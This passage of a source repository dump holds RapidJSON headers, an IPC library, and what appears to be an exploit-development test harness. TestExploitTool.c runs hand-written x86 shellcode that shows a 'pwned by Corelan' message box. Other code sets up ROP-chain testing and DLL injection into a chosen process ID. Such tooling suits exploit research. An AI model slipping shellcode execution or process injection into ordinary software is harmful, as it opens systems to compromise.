the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_ISTREAMWRAPPER_H_ 16 | #define RAPIDJSON_ISTREAMWRAPPER_H_ 17 | 18 | #include "stream.h" 19 | #include 20 | 21 | #ifdef __clang__ 22 | RAPIDJSON_DIAG_PUSH 23 | RAPIDJSON_DIAG_OFF(padded) 24 | #endif 25 | 26 | #ifdef _MSC_VER 27 | RAPIDJSON_DIAG_PUSH 28 | RAPIDJSON_DIAG_OFF(4351) // new behavior: elements of array 'array' will be default initialized 29 | #endif 30 | 31 | RAPIDJSON_NAMESPACE_BEGIN 32 | 33 | //! Wrapper of \c std::basic_istream into RapidJSON's Stream concept. 34 | /*! 35 | The classes can be wrapped including but not limited to: 36 | 37 | - \c std::istringstream 38 | - \c std::stringstream 39 | - \c std::wistringstream 40 | - \c std::wstringstream 41 | - \c std::ifstream 42 | - \c std::fstream 43 | - \c std::wifstream 44 | - \c std::wfstream 45 | 46 | \tparam StreamType Class derived from \c std::basic_istream. 47 | */ 48 | 49 | template 50 | class BasicIStreamWrapper { 51 | public: 52 | typedef typename StreamType::char_type Ch; 53 | BasicIStreamWrapper(StreamType& stream) : stream_(stream), count_(), peekBuffer_() {} 54 | 55 | Ch Peek() const { 56 | typename StreamType::int_type c = stream_.peek(); 57 | return RAPIDJSON_LIKELY(c != StreamType::traits_type::eof()) ? static_cast(c) : static_cast('\0'); 58 | } 59 | 60 | Ch Take() { 61 | typename StreamType::int_type c = stream_.get(); 62 | if (RAPIDJSON_LIKELY(c != StreamType::traits_type::eof())) { 63 | count_++; 64 | return static_cast(c); 65 | } 66 | else 67 | return '\0'; 68 | } 69 | 70 | // tellg() may return -1 when failed. So we count by ourself. 71 | size_t Tell() const { return count_; } 72 | 73 | Ch* PutBegin() { RAPIDJSON_ASSERT(false); return 0; } 74 | void Put(Ch) { RAPIDJSON_ASSERT(false); } 75 | void Flush() { RAPIDJSON_ASSERT(false); } 76 | size_t PutEnd(Ch*) { RAPIDJSON_ASSERT(false); return 0; } 77 | 78 | // For encoding detection only. 79 | const Ch* Peek4() const { 80 | RAPIDJSON_ASSERT(sizeof(Ch) == 1); // Only usable for byte stream. 81 | int i; 82 | bool hasError = false; 83 | for (i = 0; i < 4; ++i) { 84 | typename StreamType::int_type c = stream_.get(); 85 | if (c == StreamType::traits_type::eof()) { 86 | hasError = true; 87 | stream_.clear(); 88 | break; 89 | } 90 | peekBuffer_[i] = static_cast(c); 91 | } 92 | for (--i; i >= 0; --i) 93 | stream_.putback(peekBuffer_[i]); 94 | return !hasError ? peekBuffer_ : 0; 95 | } 96 | 97 | private: 98 | BasicIStreamWrapper(const BasicIStreamWrapper&); 99 | BasicIStreamWrapper& operator=(const BasicIStreamWrapper&); 100 | 101 | StreamType& stream_; 102 | size_t count_; //!< Number of characters read. Note: 103 | mutable Ch peekBuffer_[4]; 104 | }; 105 | 106 | typedef BasicIStreamWrapper IStreamWrapper; 107 | typedef BasicIStreamWrapper WIStreamWrapper; 108 | 109 | #if defined(__clang__) || defined(_MSC_VER) 110 | RAPIDJSON_DIAG_POP 111 | #endif 112 | 113 | RAPIDJSON_NAMESPACE_END 114 | 115 | #endif // RAPIDJSON_ISTREAMWRAPPER_H_ 116 | -------------------------------------------------------------------------------- /Resources/Rapidjson/memorybuffer.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_MEMORYBUFFER_H_ 16 | #define RAPIDJSON_MEMORYBUFFER_H_ 17 | 18 | #include "stream.h" 19 | #include "internal/stack.h" 20 | 21 | RAPIDJSON_NAMESPACE_BEGIN 22 | 23 | //! Represents an in-memory output byte stream. 24 | /*! 25 | This class is mainly for being wrapped by EncodedOutputStream or AutoUTFOutputStream. 26 | 27 | It is similar to FileWriteBuffer but the destination is an in-memory buffer instead of a file. 28 | 29 | Differences between MemoryBuffer and StringBuffer: 30 | 1. StringBuffer has Encoding but MemoryBuffer is only a byte buffer. 31 | 2. StringBuffer::GetString() returns a null-terminated string. MemoryBuffer::GetBuffer() returns a buffer without terminator. 32 | 33 | \tparam Allocator type for allocating memory buffer. 34 | \note implements Stream concept 35 | */ 36 | template 37 | struct GenericMemoryBuffer { 38 | typedef char Ch; // byte 39 | 40 | GenericMemoryBuffer(Allocator* allocator = 0, size_t capacity = kDefaultCapacity) : stack_(allocator, capacity) {} 41 | 42 | void Put(Ch c) { *stack_.template Push() = c; } 43 | void Flush() {} 44 | 45 | void Clear() { stack_.Clear(); } 46 | void ShrinkToFit() { stack_.ShrinkToFit(); } 47 | Ch* Push(size_t count) { return stack_.template Push(count); } 48 | void Pop(size_t count) { stack_.template Pop(count); } 49 | 50 | const Ch* GetBuffer() const { 51 | return stack_.template Bottom(); 52 | } 53 | 54 | size_t GetSize() const { return stack_.GetSize(); } 55 | 56 | static const size_t kDefaultCapacity = 256; 57 | mutable internal::Stack stack_; 58 | }; 59 | 60 | typedef GenericMemoryBuffer<> MemoryBuffer; 61 | 62 | //! Implement specialized version of PutN() with memset() for better performance. 63 | template<> 64 | inline void PutN(MemoryBuffer& memoryBuffer, char c, size_t n) { 65 | std::memset(memoryBuffer.stack_.Push(n), c, n * sizeof(c)); 66 | } 67 | 68 | RAPIDJSON_NAMESPACE_END 69 | 70 | #endif // RAPIDJSON_MEMORYBUFFER_H_ 71 | -------------------------------------------------------------------------------- /Resources/Rapidjson/memorystream.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_MEMORYSTREAM_H_ 16 | #define RAPIDJSON_MEMORYSTREAM_H_ 17 | 18 | #include "stream.h" 19 | 20 | #ifdef __clang__ 21 | RAPIDJSON_DIAG_PUSH 22 | RAPIDJSON_DIAG_OFF(unreachable-code) 23 | RAPIDJSON_DIAG_OFF(missing-noreturn) 24 | #endif 25 | 26 | RAPIDJSON_NAMESPACE_BEGIN 27 | 28 | //! Represents an in-memory input byte stream. 29 | /*! 30 | This class is mainly for being wrapped by EncodedInputStream or AutoUTFInputStream. 31 | 32 | It is similar to FileReadBuffer but the source is an in-memory buffer instead of a file. 33 | 34 | Differences between MemoryStream and StringStream: 35 | 1. StringStream has encoding but MemoryStream is a byte stream. 36 | 2. MemoryStream needs size of the source buffer and the buffer don't need to be null terminated. StringStream assume null-terminated string as source. 37 | 3. MemoryStream supports Peek4() for encoding detection. StringStream is specified with an encoding so it should not have Peek4(). 38 | \note implements Stream concept 39 | */ 40 | struct MemoryStream { 41 | typedef char Ch; // byte 42 | 43 | MemoryStream(const Ch *src, size_t size) : src_(src), begin_(src), end_(src + size), size_(size) {} 44 | 45 | Ch Peek() const { return RAPIDJSON_UNLIKELY(src_ == end_) ? '\0' : *src_; } 46 | Ch Take() { return RAPIDJSON_UNLIKELY(src_ == end_) ? '\0' : *src_++; } 47 | size_t Tell() const { return static_cast(src_ - begin_); } 48 | 49 | Ch* PutBegin() { RAPIDJSON_ASSERT(false); return 0; } 50 | void Put(Ch) { RAPIDJSON_ASSERT(false); } 51 | void Flush() { RAPIDJSON_ASSERT(false); } 52 | size_t PutEnd(Ch*) { RAPIDJSON_ASSERT(false); return 0; } 53 | 54 | // For encoding detection only. 55 | const Ch* Peek4() const { 56 | return Tell() + 4 <= size_ ? src_ : 0; 57 | } 58 | 59 | const Ch* src_; //!< Current read position. 60 | const Ch* begin_; //!< Original head of the string. 61 | const Ch* end_; //!< End of stream. 62 | size_t size_; //!< Size of the stream. 63 | }; 64 | 65 | RAPIDJSON_NAMESPACE_END 66 | 67 | #ifdef __clang__ 68 | RAPIDJSON_DIAG_POP 69 | #endif 70 | 71 | #endif // RAPIDJSON_MEMORYBUFFER_H_ 72 | -------------------------------------------------------------------------------- /Resources/Rapidjson/ostreamwrapper.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_OSTREAMWRAPPER_H_ 16 | #define RAPIDJSON_OSTREAMWRAPPER_H_ 17 | 18 | #include "stream.h" 19 | #include 20 | 21 | #ifdef __clang__ 22 | RAPIDJSON_DIAG_PUSH 23 | RAPIDJSON_DIAG_OFF(padded) 24 | #endif 25 | 26 | RAPIDJSON_NAMESPACE_BEGIN 27 | 28 | //! Wrapper of \c std::basic_ostream into RapidJSON's Stream concept. 29 | /*! 30 | The classes can be wrapped including but not limited to: 31 | 32 | - \c std::ostringstream 33 | - \c std::stringstream 34 | - \c std::wpstringstream 35 | - \c std::wstringstream 36 | - \c std::ifstream 37 | - \c std::fstream 38 | - \c std::wofstream 39 | - \c std::wfstream 40 | 41 | \tparam StreamType Class derived from \c std::basic_ostream. 42 | */ 43 | 44 | template 45 | class BasicOStreamWrapper { 46 | public: 47 | typedef typename StreamType::char_type Ch; 48 | BasicOStreamWrapper(StreamType& stream) : stream_(stream) {} 49 | 50 | void Put(Ch c) { 51 | stream_.put(c); 52 | } 53 | 54 | void Flush() { 55 | stream_.flush(); 56 | } 57 | 58 | // Not implemented 59 | char Peek() const { RAPIDJSON_ASSERT(false); return 0; } 60 | char Take() { RAPIDJSON_ASSERT(false); return 0; } 61 | size_t Tell() const { RAPIDJSON_ASSERT(false); return 0; } 62 | char* PutBegin() { RAPIDJSON_ASSERT(false); return 0; } 63 | size_t PutEnd(char*) { RAPIDJSON_ASSERT(false); return 0; } 64 | 65 | private: 66 | BasicOStreamWrapper(const BasicOStreamWrapper&); 67 | BasicOStreamWrapper& operator=(const BasicOStreamWrapper&); 68 | 69 | StreamType& stream_; 70 | }; 71 | 72 | typedef BasicOStreamWrapper OStreamWrapper; 73 | typedef BasicOStreamWrapper WOStreamWrapper; 74 | 75 | #ifdef __clang__ 76 | RAPIDJSON_DIAG_POP 77 | #endif 78 | 79 | RAPIDJSON_NAMESPACE_END 80 | 81 | #endif // RAPIDJSON_OSTREAMWRAPPER_H_ 82 | -------------------------------------------------------------------------------- /Resources/Rapidjson/stringbuffer.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_STRINGBUFFER_H_ 16 | #define RAPIDJSON_STRINGBUFFER_H_ 17 | 18 | #include "stream.h" 19 | #include "internal/stack.h" 20 | 21 | #if RAPIDJSON_HAS_CXX11_RVALUE_REFS 22 | #include // std::move 23 | #endif 24 | 25 | #include "internal/stack.h" 26 | 27 | #if defined(__clang__) 28 | RAPIDJSON_DIAG_PUSH 29 | RAPIDJSON_DIAG_OFF(c++98-compat) 30 | #endif 31 | 32 | RAPIDJSON_NAMESPACE_BEGIN 33 | 34 | //! Represents an in-memory output stream. 35 | /*! 36 | \tparam Encoding Encoding of the stream. 37 | \tparam Allocator type for allocating memory buffer. 38 | \note implements Stream concept 39 | */ 40 | template 41 | class GenericStringBuffer { 42 | public: 43 | typedef typename Encoding::Ch Ch; 44 | 45 | GenericStringBuffer(Allocator* allocator = 0, size_t capacity = kDefaultCapacity) : stack_(allocator, capacity) {} 46 | 47 | #if RAPIDJSON_HAS_CXX11_RVALUE_REFS 48 | GenericStringBuffer(GenericStringBuffer&& rhs) : stack_(std::move(rhs.stack_)) {} 49 | GenericStringBuffer& operator=(GenericStringBuffer&& rhs) { 50 | if (&rhs != this) 51 | stack_ = std::move(rhs.stack_); 52 | return *this; 53 | } 54 | #endif 55 | 56 | void Put(Ch c) { *stack_.template Push() = c; } 57 | void PutUnsafe(Ch c) { *stack_.template PushUnsafe() = c; } 58 | void Flush() {} 59 | 60 | void Clear() { stack_.Clear(); } 61 | void ShrinkToFit() { 62 | // Push and pop a null terminator. This is safe. 63 | *stack_.template Push() = '\0'; 64 | stack_.ShrinkToFit(); 65 | stack_.template Pop(1); 66 | } 67 | 68 | void Reserve(size_t count) { stack_.template Reserve(count); } 69 | Ch* Push(size_t count) { return stack_.template Push(count); } 70 | Ch* PushUnsafe(size_t count) { return stack_.template PushUnsafe(count); } 71 | void Pop(size_t count) { stack_.template Pop(count); } 72 | 73 | const Ch* GetString() const { 74 | // Push and pop a null terminator. This is safe. 75 | *stack_.template Push() = '\0'; 76 | stack_.template Pop(1); 77 | 78 | return stack_.template Bottom(); 79 | } 80 | 81 | //! Get the size of string in bytes in the string buffer. 82 | size_t GetSize() const { return stack_.GetSize(); } 83 | 84 | //! Get the length of string in Ch in the string buffer. 85 | size_t GetLength() const { return stack_.GetSize() / sizeof(Ch); } 86 | 87 | static const size_t kDefaultCapacity = 256; 88 | mutable internal::Stack stack_; 89 | 90 | private: 91 | // Prohibit copy constructor & assignment operator. 92 | GenericStringBuffer(const GenericStringBuffer&); 93 | GenericStringBuffer& operator=(const GenericStringBuffer&); 94 | }; 95 | 96 | //! String buffer with UTF8 encoding 97 | typedef GenericStringBuffer > StringBuffer; 98 | 99 | template 100 | inline void PutReserve(GenericStringBuffer& stream, size_t count) { 101 | stream.Reserve(count); 102 | } 103 | 104 | template 105 | inline void PutUnsafe(GenericStringBuffer& stream, typename Encoding::Ch c) { 106 | stream.PutUnsafe(c); 107 | } 108 | 109 | //! Implement specialized version of PutN() with memset() for better performance. 110 | template<> 111 | inline void PutN(GenericStringBuffer >& stream, char c, size_t n) { 112 | std::memset(stream.stack_.Push(n), c, n * sizeof(c)); 113 | } 114 | 115 | RAPIDJSON_NAMESPACE_END 116 | 117 | #if defined(__clang__) 118 | RAPIDJSON_DIAG_POP 119 | #endif 120 | 121 | #endif // RAPIDJSON_STRINGBUFFER_H_ 122 | -------------------------------------------------------------------------------- /Resources/TestExploitTool/TestExploitTool.c: -------------------------------------------------------------------------------- 1 | // TestExploitTool.c : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | char code[] = 8 | 9 | //first put our strings on the stack 10 | "\x68\x6c\x61\x6e\x00" // push "Corelan" ==> Caption 11 | "\x68\x43\x6f\x72\x65" // 12 | "\x8b\xdc" // mov ebx,esp ==> this puts a pointer to the caption into ebx 13 | // 14 | "\x68\x61\x6e\x20\x00" // push "You have been pwned by Corelan" ==> Text 15 | "\x68\x6f\x72\x65\x6c" // 16 | "\x68\x62\x79\x20\x43" // 17 | "\x68\x6e\x65\x64\x20" // 18 | "\x68\x6e\x20\x70\x77" // 19 | "\x68\x20\x62\x65\x65" // 20 | "\x68\x68\x61\x76\x65" // 21 | "\x68\x59\x6f\x75\x20" // 22 | "\x8b\xcc" // mov ecx,esp ==> this puts a pointer to the text into ecx 23 | 24 | // now put the parameters/pointers onto the stack 25 | // clear out eax and push it to the stack 26 | "\x33\xc0" //xor eax,eax ==> eax is now 00000000 27 | 28 | "\x50" // push eax ==> 1st parameter is 0 29 | "\x53" // push ebx ==> 2nd parameter is caption 30 | "\x51" // push ecx ==> 3rd parameter is text 31 | "\x50" // push eax ==> 4th parameter is 0 32 | 33 | //stack is now set up with 4 pointers 34 | //but we need to add 8 more bytes to the stack 35 | //to make sure the parameters are read from the right offset 36 | 37 | "\x68\x07\x15\x41\x00" // push 0x00411507 ==> the return address in main fuction 38 | "\xc7\xc6\x30\x88\x64\x77" // mov esi,0x77648830 ==> the function address to be aclled 39 | "\xff\xe6"; // jmp esi ==> launch MessageBox 40 | 41 | int main(int argc, char **argv) 42 | { 43 | MessageBoxA(NULL, 44 | "You have been pwned by Corelan", 45 | "Corelan", 46 | MB_OK); 47 | 48 | int(*func)(); 49 | func = (int(*)()) code; 50 | (int)(*func)(); 51 | } -------------------------------------------------------------------------------- /Resources/TestExploitTool/TestExploitTool.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /Resources/TestExploitTool/stdafx.c: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // TestExploitTool.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Resources/TestExploitTool/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /Resources/TestExploitTool/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Resources/TestTool/TestTool.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testtoolagent", "testtoolagent\testtoolagent.vcxproj", "{C039526D-043A-40A1-8698-B3FAB5BD41B2}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testtool", "testtool\testtool.vcxproj", "{116A12A8-29EA-48D1-B91C-92F016D39403}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x64.ActiveCfg = Debug|x64 19 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x64.Build.0 = Debug|x64 20 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x86.ActiveCfg = Debug|Win32 21 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x86.Build.0 = Debug|Win32 22 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x64.ActiveCfg = Release|x64 23 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x64.Build.0 = Release|x64 24 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x86.ActiveCfg = Release|Win32 25 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x86.Build.0 = Release|Win32 26 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Debug|x64.ActiveCfg = Debug|x64 27 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Debug|x64.Build.0 = Debug|x64 28 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Debug|x86.ActiveCfg = Debug|Win32 29 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Debug|x86.Build.0 = Debug|Win32 30 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Release|x64.ActiveCfg = Release|x64 31 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Release|x64.Build.0 = Release|x64 32 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Release|x86.ActiveCfg = Release|Win32 33 | {116A12A8-29EA-48D1-B91C-92F016D39403}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /Resources/TestTool/common/common.h: -------------------------------------------------------------------------------- 1 | #ifndef _COMMON_H_ 2 | #define _COMMON_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | namespace TestCommon 20 | { 21 | enum ExecutorsMode 22 | { 23 | TEST_ROP_CHAIN = 0x01, 24 | GET_REMOTE_FUNCTION_ADDRESS, 25 | NA, 26 | }; 27 | 28 | inline const wchar_t* ExecutorModeToString(ExecutorsMode value) 29 | { 30 | switch (value) 31 | { 32 | case TEST_ROP_CHAIN: return L"Test ROP Chain"; 33 | case GET_REMOTE_FUNCTION_ADDRESS: return L"Get Remote Function Address"; 34 | default: return L"[Unknown TestExecutor]"; 35 | } 36 | } 37 | 38 | struct TestData 39 | { 40 | TestData() {}; 41 | 42 | std::wstring testcaseFile; 43 | std::wstring fileToInject; 44 | std::wstring pidToInject; 45 | std::wstring channelID; 46 | }; 47 | 48 | static const bool DEFAULT_VERBOSITY_STATUS = false; 49 | static const ExecutorsMode DEFAULT_EXECUTOR_MODE = ExecutorsMode::NA; 50 | static const std::wstring DEFAULT_DLL_TO_INJECT = L"testtoolagent.dll"; 51 | static const std::wstring PRE_CHANNEL_TOKEN = L"TESTTOOLAGENTIPC_"; 52 | 53 | typedef std::vector ARRAYBYTE; 54 | 55 | static inline void Xtrace(LPCTSTR lpszFormat, ...) 56 | { 57 | va_list args; 58 | va_start(args, lpszFormat); 59 | int nBuf; 60 | TCHAR szBuffer[2048] = { 0 }; //fix this 61 | nBuf = _vsnwprintf_s(szBuffer, 2047, lpszFormat, args); 62 | ::OutputDebugString(szBuffer); 63 | va_end(args); 64 | } 65 | } 66 | 67 | 68 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/common/ipc.h: -------------------------------------------------------------------------------- 1 | #ifndef _BREEZE_SIMPLE_IPC_H_ 2 | #define _BREEZE_SIMPLE_IPC_H_ 3 | 4 | 5 | #define MAX_NAME_LEN 64 6 | 7 | // 4M 8 | #define MEMMAP_SIZE 4 * 1024 *1024 9 | 10 | #ifdef __cplusplus 11 | extern "C" { 12 | #endif 13 | 14 | #pragma pack(push, 1) 15 | typedef struct _IpcServer{ 16 | HANDLE mapFile; 17 | HANDLE reqEvent; 18 | HANDLE repEvent; 19 | HANDLE readyEvent; 20 | HANDLE doneEvent; 21 | BYTE * buf; 22 | DWORD timeout; 23 | }IpcServer, *PIpcServer; 24 | 25 | #pragma warning( push ) 26 | #pragma warning(disable:4200) 27 | typedef struct _CommPacket{ 28 | ULONG size; 29 | ULONG cmd; 30 | BYTE data[0]; 31 | }CommPacket, *PCommPacket; 32 | #pragma warning( pop ) 33 | 34 | #pragma pack(pop) 35 | 36 | #ifdef __cplusplus 37 | IpcServer* ServerCreate(LPCTSTR serverName = NULL); 38 | #else 39 | IpcServer* ServerCreate(LPCTSTR serverName); 40 | #endif 41 | BOOL ServerWaitClientDone(IpcServer* server); 42 | BOOL ServerWaitForRequst(IpcServer* server); 43 | VOID ServerReplied(IpcServer* server); 44 | VOID ServerClose(IpcServer* server); 45 | VOID ServerReady(IpcServer* server); 46 | 47 | #ifdef __cplusplus 48 | CommPacket* ClientRequest(ULONG cmd, const BYTE* data, SIZE_T size, LPCTSTR serverName = NULL, DWORD timeout = 1000); 49 | #else 50 | CommPacket* ClientRequest(ULONG cmd, const BYTE* data, SIZE_T size, LPCTSTR serverName, DWORD timeout); 51 | #endif 52 | VOID FreePacket(CommPacket *packet); 53 | 54 | 55 | #ifdef __cplusplus 56 | } 57 | #endif 58 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/common/ipcpp.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // or paste `ipc.h` and `ipc.c`'s code here. 5 | #include "ipc.h" 6 | extern "C" { 7 | #include "ipc.c" 8 | }; 9 | 10 | #include "ipcpp.h" 11 | 12 | #pragma comment(lib, "Ws2_32.lib") 13 | 14 | namespace dipc 15 | { 16 | mutex::mutex() {}; 17 | mutex::~mutex() {}; 18 | void mutex::lock() { 19 | while(this->interlock_ == 1 20 | || InterlockedCompareExchange(&this->interlock_, 1, 0) == 1) { 21 | Sleep(1); 22 | } 23 | } 24 | void mutex::unlock() { 25 | this->interlock_ = 0; 26 | } 27 | 28 | locker::locker(mutex& m): m_(m) { 29 | m_.lock(); 30 | } 31 | locker::~locker() { 32 | m_.unlock(); 33 | } 34 | 35 | server::server(const std::tstring& name, int timeout) : 36 | data_(NULL), stop_(false), routers_() { 37 | do { 38 | data_ = ServerCreate(name.c_str()); 39 | if (data_) { 40 | data_->timeout = timeout; 41 | } 42 | } while (false); 43 | } 44 | 45 | server::~server(){ } 46 | 47 | void server::run() { 48 | if (!data_) { 49 | return; 50 | } 51 | stop_ = false; 52 | while(!stop_) { 53 | ServerReady(data_); 54 | if (ServerWaitForRequst(data_)) { 55 | CommPacket* packet = (CommPacket*)data_->buf; 56 | std::vector::size_type i = 0; 57 | for (; i < routers_.size(); i++) 58 | { 59 | if (routers_[i].cmd == packet->cmd) { 60 | packet->size = routers_[i].handler((unsigned char*)packet->data) + sizeof(CommPacket); 61 | break; 62 | } 63 | } 64 | if (i == routers_.size()) { 65 | packet->cmd = -1; 66 | packet->size = sizeof(CommPacket); 67 | } 68 | ServerReplied(data_); 69 | ServerWaitClientDone(data_); 70 | } 71 | } 72 | } 73 | 74 | void server::stop() { stop_ = true; } 75 | void server::route(int cmd, pf_handler handler) { 76 | locker l(this->mr_); 77 | std::vector::iterator it = routers_.begin(); 78 | for (; it != routers_.end(); it++) 79 | { 80 | if (it->cmd == cmd) { 81 | it->handler = handler; 82 | break; 83 | } 84 | } 85 | if (it == routers_.end()) { 86 | router r = {cmd, handler}; 87 | routers_.push_back(r); 88 | } 89 | } 90 | 91 | client::client(const std::tstring& server_name, int timeout) : 92 | server_name(server_name), timeout(timeout) { } 93 | 94 | client::~client() { } 95 | 96 | byte_array client::request(int cmd, unsigned char* data, int data_size) { 97 | byte_array ret; 98 | CommPacket* packet = ClientRequest(cmd, data, data_size, server_name.c_str(), timeout); 99 | if (packet) { 100 | if (packet->cmd == cmd) { 101 | ret.insert(ret.begin(), (unsigned char*)packet->data, (unsigned char*)packet + packet->size); 102 | } 103 | FreePacket(packet); 104 | } 105 | return ret; 106 | } 107 | } -------------------------------------------------------------------------------- /Resources/TestTool/common/ipcpp.h: -------------------------------------------------------------------------------- 1 | #ifndef _DIPC_H_ 2 | #define _DIPC_H_ 3 | 4 | #include 5 | 6 | #include "ipc.h" 7 | 8 | namespace dipc 9 | { 10 | class mutex 11 | { 12 | private: 13 | volatile LONG interlock_; 14 | public: 15 | mutex(); 16 | ~mutex(); 17 | private: 18 | void lock(); 19 | void unlock(); 20 | friend class locker; 21 | }; 22 | 23 | class locker 24 | { 25 | mutex& m_; 26 | public: 27 | locker(mutex& m); 28 | ~locker(); 29 | }; 30 | 31 | typedef int (*pf_handler)(unsigned char* data); 32 | 33 | #ifdef _UNICODE 34 | #define tstring wstring 35 | #else 36 | #define tstring string 37 | #endif 38 | 39 | class server { 40 | struct router { 41 | int cmd; 42 | pf_handler handler; 43 | }; 44 | typedef IpcServer server_data; 45 | 46 | public: 47 | server(const std::tstring& name 